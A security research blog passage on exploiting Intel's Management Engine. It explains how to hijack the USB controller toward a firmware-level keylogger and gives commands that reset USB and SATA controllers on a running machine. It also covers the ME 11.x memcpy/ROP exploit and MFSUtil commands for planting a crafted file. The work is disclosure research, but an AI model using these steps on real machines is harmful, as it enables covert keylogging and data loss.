Exploiting Intel’s Management Engine – Part 3: USB hijacking (INTEL-SA-00086)

In mid-November, a little over two four nine months ago, I wrote Part 1 and Part 2 of my series of articles about exploiting the Intel ME. I also said I’d write Part 3 by the end of the week. Oops.

Unfortunately, a lot of stuff happened, life caught up to me, then I became busy with another hobby, and then extremely busy with starting a new business of mine (a D&D Game hosting service for Foundry Virtual Tabletop). I’ve wanted to finish my third article for a while now, and I’m taking the time to do it today, though it might not be as verbose as usual because my time is very limited lately (also, it’s been so long, my memory of everything I did isn’t as fresh as I’d want it to be). Me finding a new hobby around D&D gaming and now working on my new business venture is what prompted me to start these articles in the first place, since I knew I wouldn’t have any more time to actually finish this project I started so long ago, so here’s everything I did so far, maybe someone else will finish it.

The big question when it comes to getting code execution on the Intel ME might be “Why?” Well, I thought it would be fun to try and create a keylogger that runs directly on the ME. Not many people know this, but one of the first things I did as a script kiddie was play around with keyloggers. While they have the “steal your friend’s passwords” use, I had one installed on my own PC and it was extremely useful for recovering content I’d write (before text editors or email apps had auto-save features) or using it as a log of what I did and when I did it.

How to keylog? The basics.

How can we use the ME to keylog a machine? The answer is simple, we hijack the USB controller; hence the title of this article!

We need to go back to the PT research Black Hat slides, but not the same ones I mentioned in my previous articles, not the Black Hat Europe 2017 slides, but the Black Hat Asia 2019 ones about Intel VISA (Visualization of Internal Signals Architecture).

In it, Mark Ermolov and Maxim Goryachi talk about the IOSF, the Intel On-chip System Fabric (I briefly mentioned it in Part 2) and explain that it’s used to interconnect all the IP units (USB controller, Graphics card, SATA controller, Audio controller, Ethernet adapter, etc..) of the PCH to each other.

I’m fairly certain (though not 100% sure) that the way it works is that everything is connected to the IOSF, and the IOSF decides which IP unit actually appears to be connected to what, based on their access permissions. So when you talk over the PCI bus to a device, the PCI bridge will simply proxy everything to the IOSF Primary by specifying the Dest ID based on the PCI BDF (Bus/Device/Function), so it uses the IOSF bus internally instead of an actual PCI bus. The whole thing is managed with a permission/identification system called SAI which allows the IOSF to filter the requests and redirect them accordingly.

See the following interesting tidbits from PT’s slides (IP in this context means an Intellectual Property unit):

Page 33 of Intel VISA: Through the Rabbit Hole
Page 34 of Intel VISA: Through the Rabbit Hole

That’s for the IOSF Primary, but there’s also the IOSF Sideband. My understanding of it is that everything is connected to the IOSF via the sideband too and it can be used to bypass the entire bus routes by specifying what device you want to communicate with. I’m not entirely sure yet on the exact differences between the IOSF primary and the sideband, but that’s what we used before in order to enable Red JTAG Unlock on the Dfx-Aggregator device and enable DCI on the DCI device.

Page 35 of Intel VISA: Through the Rabbit Hole

Knowing all that, we can start to poke at the USB device using its Sideband channel.

Woah there, slow down!

Ok! Maybe we can’t start right away, because we have no idea how to do any of that, just yet. I don’t want to explain however how I got to that point because it’s long and boring. The summary though is that I dumped all the addresses from the MMIO ranges that the BUP module had access to, then tried to find some patterns there. I did find a table that contained addresses, and after a while, with a lot of trial and error and some poking at the BUP code, I figured that at address 0xF00A9000 was the “ATT Bridge” that PT mentioned which has tables for mapping local addresses to a sideband channel. I have also figured out (with help from others, as always) that the format of those configuration channels are :

OffsetSizeBitsDescription
0x004MMIO address used to access the SB channel
0x044Size of the SB window
0x084Control flags (bit 0= enabled, bit 1= locked)
0x0C12unused as far as I can see
0x184Sideband channel
0-7Sideband Port ID (0x84 = Dfx-Agg device)
8-15Read opcode (6 = Read Private Configuration Space)
16-23Write opcode (7 = Read Private Configuration Space)
24-27BAR
28posted
29not sure
0x1C4Sideband access type
0-2Function ID
3-7Device ID
8-15Root space (0 = Main CPU, 1 = CSME)

I’ve already explained the format of the ‘Sideband channel’ in my Part 2 article, that was where the 0x70684 magic value was which was used for accessing the Dfx-Agg device (port 0x84, read opcode 6, write opcode 7).

We are also going to need to know what the Port ID for the USB controller (called the XHCI controller) is. For Skylake, it’s easy, it was in the datasheet I mentioned before, but for Apollolake, I had to brute force all the ports and try to figure out what their content was for. Eventually, I had port 0xa2 for APL, and 0xe6 for SKL.

Another thing to note, the main CPU has to be booted for this to work, otherwise the XHCI controller is not powered and doesn’t respond to any requests. I had also spent a lot of time understanding and poking at the memory segments/paging to understand how the CSME memory space is organized. I won’t bore you with that either, but I wrote scripts to dump the segment list and paging information, you will find all of that in my ipclib.

IPCLib?

That’s a little python library I wrote which uses OpenIPC’s ipccli python module. Any time I needed to do something more than once, I wrote it there and used it. There are all sorts of useful functions, but zero documentation. You can call ‘execute_asm‘ and give it a list of instructions and it will run them, you can use ‘print_registers‘ to have it dump all of your registers, use ‘step‘ or ‘stepOver‘ or ‘goUntil‘ to do step by step debugging of the CPU (because the native stepping functions in ipccli had some quirks that made it not work as expected). You should also be using the ‘asm‘ function to decompile code, because if you use OpenIPC’s asm function directly, it will corrupt the registers and things will break when you step back into the code, so I had to back them up before decompiling and restore the registers before continuing. It also has all the bruteforcing methods I wrote as well as the XHCI Controller implementation, but more on that later.

I am releasing the code to ipclib under the GPL license and it’s available on my github. Releasing this is a big part of today’s article as well.

The best thing to do with it though is to actually read the various functions available, they can be self explanatory (like ‘print_registers‘ or ‘escalate_to_ring0‘, or ‘malloc‘ for example), or can be more obscure. Some of the functions won’t make any sense (like ‘v3_resume‘ for my 3rd attempt at resuming ME execution after the exploit runs) because I used them just to test something at some point and they’ll be completely useless to everyone but I’m not bothering on cleaning up the code or documenting it (lack of time, remember?)… I guess that just makes things more fun for reverse engineers 🙂

Also note that while I’ve explained above how to access the IOSF Sideband mapping in the ATT gasket, there’s also a DRAM mapping region which I won’t bother to explain but in ipclib, you will see it be used, so we can map any DRAM region to access it from the ME, which is pretty cool.

The XHCI Controller

Back to the meat of the subject, the XHCI Controller. Can I hijack it? It turns out the answer is yes… and no… It depends on a few things.

On Apollolake, it’s easy, I can use the sideband channel to read from the USB controller, and write to its registers. I had to read the XHCI specification and write my own XHCI controller driver in python, basing it off the coreboot and seabios implementations. I can do things such as :

  • Reset/Initialize the USB controller
  • Enumerate the devices
  • Send commands and receives events from the USB controller
  • Assign a device ID for the usb devices

I didn’t get further than that due to lack of time, but it’s a simple matter of finishing my XHCI Controller (basically rewriting the coreboot implementation in python), then I would have been able to even transfer files from/to the USB flash drives I had connected to the Gigabyte Brix for testing. It’s not much, but at least I was able to see which ones were USB 2 or USB 3 and communicate with them.

On Skylake unfortunately, I was unable to access the XHCI controller via the sideband. You can see my discussion about this on https://github.com/ptresearch/IntelTXE-PoC/issues/12

As you could read from the issue linked to above, I originally thought that it was the EPMASK that was preventing access to the XHCI controller by entirely disabling the endpoint :

EPMASK7 definition

Eventually, I figured that it was the CP, RAC and WAC access policies that were preventing the ME from communicating with the XHCI controller via the Sideband channel.

Description of the Security CP register on Apollolake

The CP, RAC and WAC are registers that define which SAI agents (which other IP units connected to the IOSF fabric) can access the registers of the sideband. CP is “Control Policy” and defines which SAI agents can read and write the CP, RAC and WAC registers themselves. RAC is “Read Access Control” and defines which SAI agents can read the registers of the unit, while WAC is “Write Access Control” and defines which agents can write to its registers.

And the reason I know that the access control is based on the CP, RAC and WAC rather than EPMASK is because when I try to read the registers of the controller using the JTAG interface (the Tap2IOSF stateport device), it works, but more than that, when trying to read the private configuration space, I’m able to read most of it, but a small region is simply not responding to my reads, indicating that access is blocked for a specific portion of the registers, and that means those are the CP, RAC and WAC registers. It also means that while the Tap2IOSF device has read/write access, it does not have CP access which is why it can’t read those access control registers.

Since we now know that the CSME doesn’t have CP or RAC access to the XHCI Controller registers, here’s a question, does it have write access? And the answer is YES! It’s funny, while we can’t read any of the registers, we can write to them without problem (which re-confirms the assumption about CP/RAC/WAC). It’s unfortunate though that PT were mistaken when they said the CSME has a full privileged SAI to access all the devices, it’s just that its SAI agent value has broader permissions, but as we can see for Skylake, the USB controller doesn’t let the ME read any of its registers, so we can’t send commands and receive events from it. To be fair though, I think the ME does have full privileged access but I think the ME removes some of its own privileges during boot, so PT were probably right anyway. It’s unfortunately the same situation with the SATA controller too, and it might be affecting other devices as well.

How to keylog, really.

Now that we can talk to the USB controller, how can we create our keylogger? That’s of course, for Apollolake, since Skylake is challenging in a different way.

First of all, when the main CPU sets the BARs and configures the XHCI Controller’s PCI configuration space, the ME can store those values, change them so the ME is actually the one communicating with the controller and it can proxy all the commands and data back and forth between the main CPU and the controller. Basically, a Man-in-the-middle attack on the USB controller, allowing it to both monitor everything that passes through USB (including keyboard and mouse of course) and store it elsewhere (perhaps on the hard drive itself since it should be relatively easy to do the same thing with the SATA controller and control it from the ME… or it could save it in RAM and periodically send it over the network since the ME also has access to the ethernet adapter). It could also be used to emulate keystrokes, which could be fun.

To explain that further, basically once the OS has booted, it configures the XHCI Controller on the PCI bus so that it can send commands to it though a command buffer by writing the commands to an area of the RAM, and when an event happens (data becomes available) from USB, the event is written in the RAM by the XHCI controller so the main CPU can read it though the event ring, and then it can read the data transferred to/from USB through the transfer ring.

See this image (From page 57 of Intels’ xHCI document) which shows the general architecture of the communication with the XHCI controller :

General Architecture of the XHCI Interface

As you can see the Cmd Ring, Event Ring, Transfer Ring and all the Data Buffers are in the Host Memory, and the configuration of where they are is stored in the MMIO Space that is set in the PCI configuration space.

To hijack the USB, the CSME just needs to wait for the OS to boot, then it would change the configuration from the MMIO registers that the OS has set in such a way that sending commands does not do anything anymore (since the xHCI controller isn’t looking at that Cmd Ring anymore), but instead, the CSME would be the one reading the RAM, deciding if it wants to forward the command, modify it, save information from it, etc.. then writing the same (or modified) command in the actual Cmd Ring that the xHCI controller is listening to. When an event or data is received, The CSME would copy that data over to the Event Ring or Data Ring that the OS has set up. And there you go, we have full control over the USB interface with our CSME in the middle attack!

Here’s a badly drawn (my art skills are amazing!) diagram showing how the Man in the Middle attack works :

CSME in the Middle

An alternative solution would be not to change any of the PCI configuration, but simply look for the command, event and transfer rings of the XHCI controller as set up by the main OS and monitor their contents directly since we can map any DRAM region to access it from the ME. By doing that, we would have less of an impact on the main CPU, with no risk of potentially decreasing the performance (especially when it comes to USB flash drive transfers), but we’d need to be able to receive interrupts from the controller. I’m not so good when it comes to interrupts, so I don’t know how that would work.

How about Skylake ?

Skylake (and Kabylake as well actually) are different because we can’t read the registers from the XHCI controller, so we can’t save the actual RAM addresses that the Host is sending command to, but since we can write to the MMIO registers, we can still do a lot of mischief. I actually had a little fun resetting the controller while the OS is booted and it caused all USB devices to stop working. I also did that on the SATA controller and all hard drives stopped responding… a lot of fun, and more of a malicious virus behavior than my original keylogger plan.

Note that I never got around to actually writing the code as a binary to run on the ME, which was ultimately my plan, which is why I’m mentioning the issue with SKL/KBL. But if I were to do the keylogger entirely using IPC commands over JTAG, then it wouldn’t be a problem since we can read from the XHCI controller via Tap2IOSF. The code I wrote in ipclib for it was mostly just a playground to test and see how it could be done from within the ME itself and I’ve confirmed that anything I’ve done so far would work exactly the same if it were executed from the ME firmware itself.

But all hope isn’t lost for getting it to work on Skylake, there are a few options still available :

  • We could try to find who sets the initial permissions on the USB controller as it boots (is it hardcoded in the silicon? is the ME itself setting it when it turns the power on? Or perhaps it’s configured in the PMC (Power Management Controller) or some other device) and it can be configured to give full access to the CSME’s SAI.
  • Instead of using the sideband channel, we could use the IOSF Primary bus directly, there’s a possibility that we could have access to it fully that.
  • We can perhaps read the registers by using the Tap2IOSF device if the ME is able to communicate with it directly and ask it to read the IOSF for us, emulating the commands sent via JTAG, which do actually work for reading even on SKL and KBL.
  • We can maybe scan the RAM to find the command/event/transfer ring buffers that the OS allocated and use them without having to read their values from the PCI configuration space
  • Maybe map those registers to another address by using another SAI, perhaps a subsystem of the ME or another device could have access to it (isn’t DMA doable from one PCI device to another for example?).

I’m sure that other ideas can be found and this problem can be circumvented. Unfortunately, as I said before, I don’t have time of my own to pursue this further, so perhaps someone else will.

Update from five months later: Well, I’m glad I delayed posting this since I actually see a different solution now. Thanks to Intel’s own CVE 2019-0090 whitepaper available here : https://www.intel.com/content/dam/www/public/us/en/security-advisory/documents/cve-2019-0090-whitepaper.pdf

On page 5, you’ll find this diagram that shows how the CSME sits between the CPU and USB and can communicate with it via the Sideband Fabric.

They also explain how the CSME takes care of loading FW onto the various IPs and it controls the IOMMU unit which checks for the SAI authorization. The CVE is about an exploit where someone could write to the ME’s SRAM before IOMMU is enabled, because SAI is not checked while IOMMU is disabled.

Explanation about CSME, IP, SAI and IOMMU

So, my new idea would be : Can we disable IOMMU? Since the ME controls it and is the one to enable it, then we should be able to disable it, then we would get to ignore SAI and get full access to the xHCI on Skylake without having to use a different method than what I have already built.

This also tells me that at some point, the ME does have access to it, then writes the firmware to it, then locks things up, so we could also try to find where it does that and patch that code to prevent it from happening. This is kind of like my alternate solution #1 above, but this new information seems to indicate that it’s the ME that handles it, and in the RBE module as well.

Let’s do this!

Alright, enough rambling. Let’s go ahead and get you all to reproduce what I did with step by step instructions.

Step 1 – Hardware setup

That’s easy, you first need to enable the exploit and get code execution with OpenIPC working for your machine. Either using the IntelTXE PoC code from PT if you’re using Apollolake, or using my instructions from my previous articles if on Skylake or Kabylake.

Step 2 – Software Setup

This should also be easy, you mostly need to have Intel System Studio installed and patched as explained in the IntelTXE PoC repository or my previous articles. Then get my ipclib code and import it into your ipython console with from ipclib import *

Step 3 – USB Listing (Apollolake)

If you’re on Apollolake, we can read/write to all the registers, and the xhci implementation I wrote is in the xhci object. You can poke at it in different ways, but to disrupt USB while the system is booted, in ipython ipc console, simply call :
xhci.reset()

To setup USB, reset ports and set addresses to the USB devices :
xhci.setup()

It should list the ports that are in use and show if they are USB 2 or USB 3 devices, though that’s the extent of it as the implementation was never finished.

Step 3 – USB Reset (Skylake/Kabylake)

If you are on Skylake or Kabylake, we can only write, but not read any of the registers, so using the xhci object’s methods will not work here as most of them try to read the status registers.

We can however do this simple write command :
xhci.bar_write32(0x80, 0x2)

which will enable the reset bit on the command register. This will reset the USB controller and prevent the OS from accessing devices. This means that your keyboard and mouse on the target machine will stop working immediately after doing that command, proving it works.

A little extra mischief

As I’ve poked at all sorts of PCI devices during my testing, I also did manage to disrupt the SATA controller when I wanted to. It’s the same principle as with USB though there is no SATA object to use.

The following commands should disable the SATA controller on Apollolake :

addr, _ = setup_sideband_channel(0x150100b5, rs=0, fid=0x90)
t.mem(phys(addr + 4), 4, 1)

And here is the command to use on Skylake and Kabylake, using the correct Sideband channel :

addr, _ = setup_sideband_channel(0x150100d9, rs=0, fid=0xb8)
t.mem(phys(addr + 4), 4, 1)

You can test it by booting the machine onto a linux system and doing dd if=/dev/sda bs=256 count=1 | hexdump -C to verify that the SATA device can be read (assuming /dev/sda is a SATA drive), then doing it again after running that command through JTAG to confirm that you get an Input/Output error.

If you’re looking for an explanation, then here’s what the command does :

In the case of kabylake, the fid=0xb8 is the function id where bits [7:3] are the PCI device id, and bits [2:0] are the function id, so 0xb8 means PCI device 23.0 which is the SATA device. The rootspace is 0 meaning the main CPU root space, and the sideband channel 0x150100d9 means :
bit 28 : posted (for writes)
bits 27-24: bar 5 (AHCI)
bits 23-16: write opcode 1 : WriteBar
bits 15-8: read opcode 0 : ReadBar
bits 7-0: Port ID 0xD9

Writing at the address + 4 is the AHCI register control, and writing bit 0 to 1 means reset controller.

As “simple” as that.

Conclusion

That’s it! That was the last of my series of articles. I’m sure there’s a lot more stuff I could write about on how I got to that point, but it’s all very tedious and boring (the proof that it’s boring is that I don’t remember most of it). You can probably figure some of the stuff out from the ipclib code that is in there.

I unfortunately never got around to doing my ‘antivirus-immune keylogger’, but it’s not impossible. It turned out that it needed a lot more work than I originally thought it would, and I blame it all on Intel for not providing documentation. I’m sure it could have been done in one week if I didn’t have to spend a year trying to understand how any of the underlying architecture works.

I’m sure there are a lot of other useful applications that can be done by running your own code in the ME. I’ve only done it using IPC scripts, but it should be possible to run binary executables (I know that PT did in their original exploit).

This whole experience was fun. More complex than I ever thought it would be, but still, a lot of fun. It also shows how dangerous the ME can be if someone hijacks it to run their own malicious firmware on it. The possibilities of having ME-viruses are huge, and it shows the importance of having good security and locking access to your flash chips if possible.

With this last article, I close the saga of the Intel ME reverse engineering and security research I’ve done in the last couple of years. I might still poke at it at some point, but I’m concentrating on other stuff for now, with my new business building a hosting service for D&D games being the focus of all my work. I hope the ipclib release I’m doing as well as these articles will be interesting to others and you’ll find something useful in it and perhaps it will inspire others to poke at things that weren’t really meant to be poked at.

It was fun, thanks for reading, and considering everything that’s happening in the world, stay safe!

Exploiting Intel’s Management Engine – Part 2: Enabling Red JTAG Unlock on Intel ME 11.x (INTEL-SA-00086)

Hey there, friend! Long time no see! Actually.. not really, I’m starting this article right after I posted Part 1: Understanding PT’s TXE PoC.

If you haven’t read part 1, then you should do that now, because this is just a continuation of my previous post, but because of its length, I decided to split it into multiple parts.

Now that we know how the existing TXE exploit works, we need to port it to ME 11.x. Unfortunately, the systracer method is very difficult to reproduce because you only control a few bits in the return address and being able to change the return address into one that is valid, doesn’t cause a crash, and returns properly into our ROP is very difficult. In my case, I had actually started porting it to ME 11.0.0.1180 which didn’t even set the systracer values, so I had no choice but to look at the exploit explained in the BlackHat Europe 2017 presentation : Using the memcpy method.

Gathering the necessary information

I will spare you the details of showing you any reversed code or assembly and just get to the point.

  • The MFS partition uses chunks of 64 bytes each
  • The MFS read function reads to a temporary buffer of 1024 bytes and if chunks are sequential in the file system, it can read multiple chunks (up to 16) at once
  • The "/home/mca/eom" file in the MFS’s fitc.cfg file needs to contain one byte with value 0x00
  • DCI needs to be activated using the CPU straps in the IFD (Intel Flash Descriptor)
  • There’s an alternate execution route that could happen if there is a home partition in the MFS (file index 8), it could cause the exploit not to work, so make sure the MFS partition does not have a file in index 8 (more on that later).
  • Because of the above, you need to enable the HAP bit. If the ME boots completely (i.e: not disabled via HAP), then the home partition gets created in MFS and the exploit stops working. the ME crashes instead and the machine becomes unbootable.
  • The shared memory context structure is at offset 0x68 of the syslib context, and within it, at offset 0x28 is the pointer to the shared memory descriptors and at offset 0x2C is the number of valid shared memory descriptors.
  • Note that the shared memory context is within the syslib context, not merely a pointer to it, so the pointer to the shared memory descriptors is at offset 0x90 (0x68 + 0x28) of the syslib context
  • The shared memory block descriptors are of size 0x14 and of the format <flags, address, size, mmio, thread_id> where the flags being set to 0x11 works fine (I believe bit 0 is ‘in use’, not sure about bit 4, but it was set in the shmem of init_trace_hub) and the thread_id is set to zero in our case.

To help with the last points about the shared memory descriptors, here’s a slightly modified graphic from one of the slides of the BlackHat Europe 2017 presentation :

Slide 43 of “How to Hack a Turned-Off Computer, or Running Unsigned Code in Intel Management Engine”

My old Librem 13 is a skylake machine and I’ve used it for all my tests as it is very easy to flash and test on. It has ME version 11.0.18.1002 (if anyone wants to follow along).

Now, the first thing we need to do is figure out where our stack is. To do that, we open the BUP module in IDA, and check the very first function that gets called from the entrypoint (before the main).

That function will initialize the syslib context, the TLS structure and the stack, therefore, we’ll find in it the hardcoded values of all those things. Here’s what it looks like :

Now I know that my stack address for ME 11.0.18.1002 is 0x60000 and the syslib context is at 0x82CAC with a size of 0x218 (not useful information for now).

What I will do is to go to the entry point and follow along the push/pop/call/ret calls in order to get the full picture of the stack all the way to the memcpy that interests me, like I did in my previous article. Here’s the result :

ME 11.0.18.1002 STACK - bup_entry :
0x60000: STACK TOP
0x5FFEC: TLS

0x5FFE8: ecx - arg to bup_main
0x5FFE4: edx - arg
0x5FFE0: eax - arg
0x5FFDC: retaddr - call bup_main
  0x5FFD8: saved ebp of bup_entry

  0x5FFD4: 0 - arg to bup_run_init_scripts
  0x5FFD0: retaddr - call bup_run_init_scripts
    0x5FFCC: saved ebp of bup_main
    0x5FFC8: saved edi
    0x5FFC4: saved esi
    0x5FFC0: saved ebx
    0x5FFBC: var_10

    0x5FFB8: retaddr - call bup_init_trace_hub
      0x5FFB4: saved ebp of bup_run_init_scripts
      0x5FFB0: saved esi
      0x5FFAC: saved ebx
      0x5FC64: STACK esp-0x348
        0x5FFA8: security cookie
        0x5FC80: ct_data
        0x5FC6C: si_features
        0x5FC68: file_size
        0x5FC64: bytes_read

        0x5FC60: edx - arg to bup_dfs_read_file
        0x5FC5C: eax - arg
        0x5FC58: esi - arg
        0x5FC54: 0 - arg
        0x5FC50: "/home/bup/ct" - arg
        0x5FC4C: retaddr - call bup_dfs_read_file
          0x5FC48: saved ebp of bup_init_trace_hub
          0x5FC44: saved edi
          0x5FC40: saved esi
          0x5FC3C: saved ebx
          0x5FB9C: STACK esp-0xA0

          0x5FB98: 0 - arg to bup_read_mfs_file
          0x5FB94: edi - arg
          0x5FB90: esi - arg
          0x5FB8C: eax - arg
          0x5FB88: 7 - arg
          0x5FB84: retaddr - call bup_read_mfs_file
            0x5FB80: saved ebp of bup_dfs_reads_file

            0x5FB7C: eax - arg to bup_read_mfs_file_ext
            0x5FB78: sm_block_id - arg
            0x5FB74: size - arg
            0x5FB70: offset - arg
            0x5FB6C: file_number - arg
            0x5FB68: msf_desc - arg
            0x5FB64: retaddr - call bup_read_mfs_file_ext
              0x5FB60: saved ebp of bup_read_mfs_file
              0x5FB5C: saved edi
              0x5FB58: saved esi
              0x5FB54: saved ebx
              0x5F6E8: STACK esp-0x46C

              0x5F6E4: ebx - arg to sys_write_shared_mem
              0x5F6E0: ebx - arg
              0x5F6DC: eax - arg
              0x5F6D8: cur_offset - arg
              0x5F6D4: sm_block_id - arg
              0x5F6D0: var_478 - arg
              0x5F6CC: retaddr - call sys_write_shared_mem
                0x5F6C8: saved ebp of bup_read_mfs_file_ext
                0x5F6C4: saved edi
                0x5F6C0: saved esi
                0x5F6BC: saved ebx
                0x5F6AC: STACK esp-0x10

                0x5F6A8: ebx - arg to memcpy_s
                0x5F6A4: edi - arg
                0x5F6A0: edx - arg
                0x5F69C: esi - arg
                0x5F698: retaddr - call memcpy_s
                  0x5F694: saved ebp of sys_write_shared_mem
                  0x5F690: saved edi
                  0x5F68C: saved esi
                  0x5F688: saved ebx

                  0x5F684: copysize - arg to memcpy
                  0x5F680: edi - arg
                  0x5F67C: ebx - arg
                  0x5F678: retaddr - call memcpy  <-------------- TARGET ADDRESS 0x5F678
                    0x5FB60: saved ebp of memcpy_s
                    0x5FB5C: saved edi
                    0x5FB58: saved esi
                    0x5FB54: saved ebx

The ct_data buffer is at address 0x5FC80, which means it still is at offset 0x380 from the top of the stack. We can also see that the return address to the memcpy call is at 0x5F678 which means it's at an offset of 0x988 from the top of the stack. This is the address/value that we want to overwrite with our exploit. If we can replace that return address by one that points to our ROP, then we have succeeded.

What else do we need? It looks like that's it, right ? We set our ROPs to do whatever we want (more on that later), fill the rest of the file up to 0x380 with our syslib context such that we have a valid number of shared memory descriptor (on Apollolake, our shared memory block id was '2', but we won't take any chances, we'll use 20!), and have all our shared memory descriptors point to the same target address, then we set our TLS structure at the end of those 0x380 bytes which itself points the syslib context within our file.

Once the last chunk in the file is read, the TLS is replaced and the syslib context also is. This means that the next chunk that gets read and copied is the one that will overwrite our return address, this means that we'll add an additional chunk to the file (64 bytes) with the value that we want to write to the return address. Considering that the value we write will be returned to, it means that we can put our ROPs directly there, but we'll just do the pop esp; ret ROP not the full ones.

The MFS filesystem

Yes, that is technically all that we need, but there are a couple of problems here. The first is that we don't control the MFS file. If we use Intel's tool to add the TraceHub Configuration file, the file will be contiguous in the MFS partition which means it will be read in one shot since we've already established that the ME optimizes its MFS reads and can read up to 16 chunks in one operation. The solution to that would be to make sure that the chunks are not in sequential order and it means we need to manipulate the MFS file on our own.

For that, we need to understand how the MFS filesystem works. Thankfully, Dmitry Sklyarov (also from Positive Technologies) had his own presentation during the the same BlackHat Europe 2017 conference that explains how the ME File System works internally. You can read all about it in his slides. Moreover, he has released a small tool called parseMFS which can be used to extract files from an MFS partition.

Unfortunately, parseMFS does not let you add or manipulate the MFS partition in any way, so I wrote my own tool, MFSUtil which uses the knowledge shared by Dmitry in his presentation and lets us manipulate the MFS partition any way we want. More specifically, it lets us :

  • Replace the "/home/bup/ct" file directly with our exploit.
  • Replace the "/home/mca/eom" so its content is 0 if needed.
  • 'De-optimize' the file so the chunks are never in sequence, forcing the ME to read each chunk separately.
  • Align the file on start/end chunk boundaries

That last one is because, while we're lucky and 0x380 ends on a chunk boundary, it will not always be the case (for example, ME 11.0.0.1180 has the ct_data at offset 0x384), so you would need the ct file to be aligned in such a way that the last byte ends on the last byte of a chunk, so when that chunk is read, the entire TLS structure is replaced, not just part of it, and the small ROP we write to replace the memcpy's return address is indeed the one that gets written, rather than the last bytes of the TLS structure.

I have now released the MFSUtil tool on github (and wow, my initial commit of it was in April 2018, I hadn't realized that it's actually been more than a year that I've started working on this), and if you look at the examples directory, you'll find the script that I use to generate a new coreboot image with an exploited ct file, but it basically does this :

# Extract file number 7 (fitc.cfg)
../MFSUtil.py -m MFS.part -x -i 7 -o 7.cfg

# Remove the /home/bup/ct file from it
../MFSUtil.py -c 7.cfg -r -f /home/bup/ct -o 7.cfg.noct

# Add the new ct file as /home/bup/ct
../MFSUtil.py -c 7.cfg.noct --add ct --alignment 2 --mode ' ---rwxr-----' --opt '?--F' --uid 3 --gid 351 -f /home/bup/ct -o fitc.cfg

# Delete file id 8 (home) from the MFS partition
../MFSUtil.py -m MFS.part -r -i 8 -o MFS.no8

# Delete file id 7 (fitc.cfg) from the MFS partition
../MFSUtil.py -m MFS.no8 -r -i 7 -o MFS.no7

# Add the modified fitc.cfg into the MFS partition
../MFSUtil.py -m MFS.no7 -a fitc.cfg --deoptimize -i 7 -o MFS.new

I'm not going to waste my time here explaining how the file system works or how the tool works. Dmitry explained the inner workings of the MFS partition very well in his presentation at BlackHat Europe 2017, and you can use the --help option of the tool (or read its README file) to figure out how to use it. The important part is that this does everything you need to make sure the ct file is in the MFS partition in the proper way so that the exploit would work.

ROPs: Return Oriented Programming

This is where it gets a little bit more interesting. The ROPs used are going to be very simple, we need to enable red unlock and do an infinite loop, oh and find pop esp; ret.

If you're not familiar with Return Oriented Programming, well.. this post is probably too in-depth for you already and I'm not going to do a tutorial on ROP (maybe some other time), but the basic premise is that if you can't write your own code to be executed, then you can use the existing code and create a fake stack where a few instructions at the end of an existing/legitimate function are executed then the function returns to the next instructions you want to execute. By chaining all these "ROP Gadgets" you can make it do whatever you want.

If you've seen my analysis of the ROPs from the previous article, then you've seen that for TXE, they do this :

// Enable DCI
side_band_mapping(0x706a8, 0x100); 
put_sel_word(0x19F, 0, 0x1010); // Sets 0x19F:0 to 0x1010

// Set DfX-agg personality
side_band_mapping(0x70684, 0x100);
put_sel_word(0x19F, 0x8400, 3); // Sets 0x19F:8400 to 3

loop();

But there are two things of interests here, first, we don't need to enable DCI because if you've read the BlackHat Europe 2017 presentation from Maxim Goryachi and Mark Ermolov, you know that you need to have DCI enabled before you execute the exploit, otherwise, the DfX Aggregator consent register will be locked, so we enable DCI using the CPU strap in the Intel Flash Descriptor. So there is only one thing we need to do : set the DfX-Agg personality value to 3. Now as you've seen above, there are a few magic numbers here, what's 0x70684 and why segment 0x19F and offset 0x8400. To explain that, let's talk a bit about the Sideband interface

IOSF Sideband

The good kind of IOSF

I won't go too in depth in explanation about the IOSF Sideband as I will explore it much more in depth in part 3 of this series of articles. No, the IOSF is not the International Otter Survival Fund, though that's the first result Google gives me and it's a lot cuter than Intel's version of that acronym. IOSF stands for Intel On-Chip System Fabric, and I think it's just a fancy word for saying "a hub that everything connects to".

The way I understand it (and maybe I'm wrong on some level, if that's the case, I'm blaming it on my attempts to simplify the explanation, but clearly I knew what I was talking about... ahumm.. ), is that Intel's optimizations of their chips has led them to use an architecture where you have every IP core connected to the IOSF (remember my tutorial on how computers work from last month? think of the full adder as an IP core, and the ALU as connecting multiple IP cores together, only in this case, we're talking about the PCH chipset and each IP core is going to be a device, such as USB controller, SATA controller, Graphics card, Ethernet controller, PCIe controller, GPIO controllers, DCI controller, DfX Aggregator, SPI, Audio, etc..). So yeah, every IP core is connected to the IOSF and from there, everything can communicate with everything, as long as they are authorized to do so.

So when the CPU wants to talk to the USB controller, it will talk to the PCH via the PCI controller and the PCI bridge will talk to the USB controller via the IOSF and forward the commands over. The sideband is a way to communicate with a device directly by passing through the IOSF and telling it which device we want to talk to and how, rather than using whatever bus was designed to communicate with the device.

The magic value 0x70684 you saw before can actually be divided into these attributes :

  • bit 29: 0 - not sure...
  • bit 28: 0 - posted
  • bits 27-24: 0 - BAR
  • bits 23-16: 0x07 - Write opcode
  • bits 15-8: 0x06 - Read opcode
  • bits 7-0: 0x84 - Sideband Port ID

Things I've learned about it : The read opcode is always an even number, the write opcode is the same +1 (read 0, write 1, read 2, write 3, etc.. ), also these are the read/write opcodes that I know :

  • Opcode 0 : Read/Write BAR
  • Opcode 2 : Unused?
  • Opcode 4 : Read/Write PCI Configuration Space
  • Opcode 6 : Read/Write Private Configuration Space

Now finding the Sideband Port ID, that's the interesting bit. It's easy to find some for skylake, just grab the 100-series PCH datasheet volume 1 from Intel, and look at the last two pages on the Primary to Sideband Bridge chapter, you'll find them listed :

Some Sideband Port IDs

There are more, and you can see 0xB8 is the port ID for DCI though we don't need it. The problem is that the DfX-Agg device is not listed in the datasheet because it's not a 'publicly available device' (it's only meant for the ME to poke at) and we need to find it on our own by looking at the BUP assembly. I won't bore you with the details (mostly because quite honestly, I don't remember how I found it) but the Port ID is 0xB7.

Actually, the BUP module has the DfX-Agg device already mapped to MMIO so it can use it, so by looking at the init scripts that get executed before bup_init_trace_hub, I can find the function bup_init_dci which is really easy to find (and thankfully, I've seen what it looks like already in slide 27 of the 34th CCC presentation). The function looks pretty much like this :

void bup_init_dci() {
  int pch_strap0;
  bup_get_pch_straps(0, &pch_strap0);

  if (!(pch_strap0 & 2))
    bup_disable_dci();
  else
    bup_enable_dci();
  if (bup_is_dci_enabled())
    bup_set_dfx_agg_consent();
  else
    bup_lock_dfx_agg();
  // Stack Guard
}

And then, looking at the bup_set_dfx_agg_consent function, it looks like this :

void bup_set_dfx_agg_consent() {
